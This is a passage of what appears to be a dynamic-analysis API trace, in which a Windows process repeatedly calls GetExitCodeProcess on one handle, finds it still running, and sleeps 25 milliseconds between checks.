(dwMilliseconds=0x19) [0275.926] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0275.926] Sleep (dwMilliseconds=0x19) [0275.961] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0275.961] Sleep (dwMilliseconds=0x19) [0276.015] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0276.015] Sleep (dwMilliseconds=0x19) [0276.050] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0276.050] Sleep (dwMilliseconds=0x19) [0276.089] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0276.089] Sleep (dwMilliseconds=0x19) [0276.124] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0276.124] Sleep (dwMilliseconds=0x19) [0276.158] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0276.158] Sleep (dwMilliseconds=0x19) [0276.193] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0276.193] Sleep (dwMilliseconds=0x19) [0276.320] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0276.320] Sleep (dwMilliseconds=0x19) [0276.378] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0276.378] Sleep (dwMilliseconds=0x19) [0276.413] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0276.413] Sleep (dwMilliseconds=0x19) [0276.448] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0276.448] Sleep (dwMilliseconds=0x19) [0276.516] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0276.516] Sleep (dwMilliseconds=0x19) [0276.638] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0276.638] Sleep (dwMilliseconds=0x19) [0276.797] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0276.798] Sleep (dwMilliseconds=0x19) [0276.840] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0276.840] Sleep (dwMilliseconds=0x19) [0276.874] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0276.874] Sleep (dwMilliseconds=0x19) [0276.909] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0276.909] Sleep (dwMilliseconds=0x19) [0276.958] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0276.958] Sleep (dwMilliseconds=0x19) [0276.995] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0276.995] Sleep (dwMilliseconds=0x19) [0277.030] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0277.030] Sleep (dwMilliseconds=0x19) [0277.110] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0277.111] Sleep (dwMilliseconds=0x19) [0277.206] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0277.206] Sleep (dwMilliseconds=0x19) [0277.243] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0277.243] Sleep (dwMilliseconds=0x19) [0277.284] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0277.284] Sleep (dwMilliseconds=0x19) [0277.360] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0277.360] Sleep (dwMilliseconds=0x19) [0277.421] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0277.421] Sleep (dwMilliseconds=0x19) [0277.495] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0277.495] Sleep (dwMilliseconds=0x19) [0277.537] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0277.537] Sleep (dwMilliseconds=0x19) [0277.581] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0277.582] Sleep (dwMilliseconds=0x19) [0277.618] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0277.618] Sleep (dwMilliseconds=0x19) [0277.654] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0277.654] Sleep (dwMilliseconds=0x19) [0277.689] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0277.689] Sleep (dwMilliseconds=0x19) [0277.766] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0277.766] Sleep (dwMilliseconds=0x19) [0277.804] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0277.804] Sleep (dwMilliseconds=0x19) [0277.888] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0277.888] Sleep (dwMilliseconds=0x19) [0277.923] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0277.923] Sleep (dwMilliseconds=0x19) [0277.970] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0277.971] Sleep (dwMilliseconds=0x19) [0278.014] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0278.014] Sleep (dwMilliseconds=0x19) [0278.048] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0278.048] Sleep (dwMilliseconds=0x19) [0278.083] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0278.083] Sleep (dwMilliseconds=0x19) [0278.118] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0278.118] Sleep (dwMilliseconds=0x19) [0278.164] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0278.165] Sleep (dwMilliseconds=0x19) [0278.200] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0278.200] Sleep (dwMilliseconds=0x19) [0278.234] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0278.234] Sleep (dwMilliseconds=0x19) [0278.269] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0278.269] Sleep (dwMilliseconds=0x19) [0278.311] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0278.311] Sleep (dwMilliseconds=0x19) [0278.356] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0278.357] Sleep (dwMilliseconds=0x19) [0278.393] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0278.393] Sleep (dwMilliseconds=0x19) [0278.427] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0278.427] Sleep (dwMilliseconds=0x19) [0278.462] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0278.462] Sleep (dwMilliseconds=0x19) [0278.502] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0278.503] Sleep (dwMilliseconds=0x19) [0278.539] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0278.539] Sleep (dwMilliseconds=0x19) [0278.582] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0278.582] Sleep (dwMilliseconds=0x19) [0278.617] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0278.617] Sleep (dwMilliseconds=0x19) [0278.685] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0278.685] Sleep (dwMilliseconds=0x19) [0278.750] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0278.750] Sleep (dwMilliseconds=0x19) [0278.790] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0278.790] Sleep (dwMilliseconds=0x19) [0278.837] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0278.837] Sleep (dwMilliseconds=0x19) [0278.908] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0278.908] Sleep (dwMilliseconds=0x19) [0278.969] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0278.969] Sleep (dwMilliseconds=0x19) [0279.019] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0279.019] Sleep (dwMilliseconds=0x19) [0279.056] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0279.056] Sleep (dwMilliseconds=0x19) [0279.091] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0279.091] Sleep (dwMilliseconds=0x19) [0279.128] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0279.129] Sleep (dwMilliseconds=0x19) [0279.162] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0279.163] Sleep (dwMilliseconds=0x19) [0279.214] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0279.214] Sleep (dwMilliseconds=0x19) [0279.278] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0279.279] Sleep (dwMilliseconds=0x19) [0279.313] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0279.314] Sleep (dwMilliseconds=0x19) [0279.349] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0279.349] Sleep (dwMilliseconds=0x19) [0279.385] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0279.385] Sleep (dwMilliseconds=0x19) [0279.487] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0279.487] Sleep (dwMilliseconds=0x19) [0279.590] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0279.590] Sleep (dwMilliseconds=0x19) [0279.704] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0279.704] Sleep (dwMilliseconds=0x19) [0279.920] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0279.920] Sleep (dwMilliseconds=0x19) [0279.986] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0279.986] Sleep (dwMilliseconds=0x19) [0280.022] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0280.022] Sleep (dwMilliseconds=0x19) [0280.055] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0280.056] Sleep (dwMilliseconds=0x19) [0280.112] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0280.112] Sleep (dwMilliseconds=0x19) [0280.147] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0280.147] Sleep (dwMilliseconds=0x19) [0280.182] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0280.182] Sleep (dwMilliseconds=0x19) [0280.265] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0280.265] Sleep (dwMilliseconds=0x19) [0280.353] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0280.354] Sleep (dwMilliseconds=0x19) [0280.388] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0280.388] Sleep (dwMilliseconds=0x19) [0280.428] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0280.428] Sleep (dwMilliseconds=0x19) [0280.470] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0280.470] Sleep (dwMilliseconds=0x19) [0280.566] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0280.566] Sleep (dwMilliseconds=0x19) [0280.637] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0280.637] Sleep (dwMilliseconds=0x19) [0280.672] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0280.672] Sleep (dwMilliseconds=0x19) [0280.713] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0280.713] Sleep (dwMilliseconds=0x19) [0280.789] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0280.789] Sleep (dwMilliseconds=0x19) [0280.828] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0280.828] Sleep (dwMilliseconds=0x19) [0280.863] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0280.863] Sleep (dwMilliseconds=0x19) [0280.903] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0280.904] Sleep (dwMilliseconds=0x19) [0280.959] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0280.959] Sleep (dwMilliseconds=0x19) [0281.006] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0281.007] Sleep (dwMilliseconds=0x19) [0281.076] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0281.076] Sleep (dwMilliseconds=0x19) [0281.119] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0281.119] Sleep (dwMilliseconds=0x19) [0281.157] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0281.157] Sleep (dwMilliseconds=0x19) [0281.191] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0281.191] Sleep (dwMilliseconds=0x19) [0281.226] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0281.226] Sleep (dwMilliseconds=0x19) [0281.260] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0281.260] Sleep (dwMilliseconds=0x19) [0281.300] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0281.300] Sleep (dwMilliseconds=0x19) [0281.336] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0281.336] Sleep (dwMilliseconds=0x19) [0281.370] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0281.370] Sleep (dwMilliseconds=0x19) [0281.441] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0281.441] Sleep (dwMilliseconds=0x19) [0281.482] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0281.482] Sleep (dwMilliseconds=0x19) [0281.517] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0281.517] Sleep (dwMilliseconds=0x19) [0281.552] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0281.552] Sleep (dwMilliseconds=0x19) [0281.602] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0281.602] Sleep (dwMilliseconds=0x19) [0281.869] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0281.869] Sleep (dwMilliseconds=0x19) [0282.015] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0282.015] Sleep (dwMilliseconds=0x19) [0282.058] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0282.058] Sleep (dwMilliseconds=0x19) [0282.133] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0282.133] Sleep (dwMilliseconds=0x19) [0282.182] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0282.182] Sleep (dwMilliseconds=0x19) [0282.273] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0282.273] Sleep (dwMilliseconds=0x19) [0282.361] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0282.361] Sleep (dwMilliseconds=0x19) [0282.405] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0282.405] Sleep (dwMilliseconds=0x19) [0282.487] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0282.487] Sleep (dwMilliseconds=0x19) [0282.529] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0282.529] Sleep (dwMilliseconds=0x19) [0282.580] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0282.580] Sleep (dwMilliseconds=0x19) [0282.646] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0282.646] Sleep (dwMilliseconds=0x19) [0282.707] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0282.707] Sleep (dwMilliseconds=0x19) [0282.823] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0282.823] Sleep (dwMilliseconds=0x19) [0282.900] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0282.900] Sleep (dwMilliseconds=0x19) [0283.023] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0283.023] Sleep (dwMilliseconds=0x19) [0283.100] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0283.100] Sleep (dwMilliseconds=0x19) [0283.171] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0283.172] Sleep (dwMilliseconds=0x19) [0283.284] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0283.284] Sleep (dwMilliseconds=0x19) [0283.349] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0283.349] Sleep (dwMilliseconds=0x19) [0283.449] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0283.449] Sleep (dwMilliseconds=0x19) [0283.493] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0283.493] Sleep (dwMilliseconds=0x19) [0283.554] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0283.554] Sleep (dwMilliseconds=0x19) [0283.588] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0283.589] Sleep (dwMilliseconds=0x19) [0283.666] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0283.666] Sleep (dwMilliseconds=0x19) [0283.770] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0283.770] Sleep (dwMilliseconds=0x19) [0283.806] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0283.806] Sleep (dwMilliseconds=0x19) [0283.842] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0283.842] Sleep (dwMilliseconds=0x19) [0283.886] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0283.886] Sleep (dwMilliseconds=0x19) [0283.941] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0283.941] Sleep (dwMilliseconds=0x19) [0283.996] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0283.996] Sleep (dwMilliseconds=0x19) [0284.032] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0284.032] Sleep (dwMilliseconds=0x19) [0284.129] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0284.129] Sleep (dwMilliseconds=0x19) [0284.164] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0284.164] Sleep (dwMilliseconds=0x19) [0284.211] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0284.211] Sleep (dwMilliseconds=0x19) [0284.257] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0284.257] Sleep (dwMilliseconds=0x19) [0284.308] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0284.308] Sleep (dwMilliseconds=0x19) [0284.349] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0284.350] Sleep (dwMilliseconds=0x19) [0284.433] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0284.433] Sleep (dwMilliseconds=0x19) [0284.498] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0284.498] Sleep (dwMilliseconds=0x19) [0284.534] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0284.534] Sleep (dwMilliseconds=0x19) [0284.579] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0284.579] Sleep (dwMilliseconds=0x19) [0284.617] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0284.617] Sleep (dwMilliseconds=0x19) [0284.674] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0284.674] Sleep (dwMilliseconds=0x19) [0284.713] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0284.713] Sleep (dwMilliseconds=0x19) [0284.796] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0284.796] Sleep (dwMilliseconds=0x19) [0284.832] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0284.833] Sleep (dwMilliseconds=0x19) [0284.867] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0284.867] Sleep (dwMilliseconds=0x19) [0284.901] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0284.901] Sleep (dwMilliseconds=0x19) [0284.977] GetExitCodeProcess (in: hProcess=0x40c, 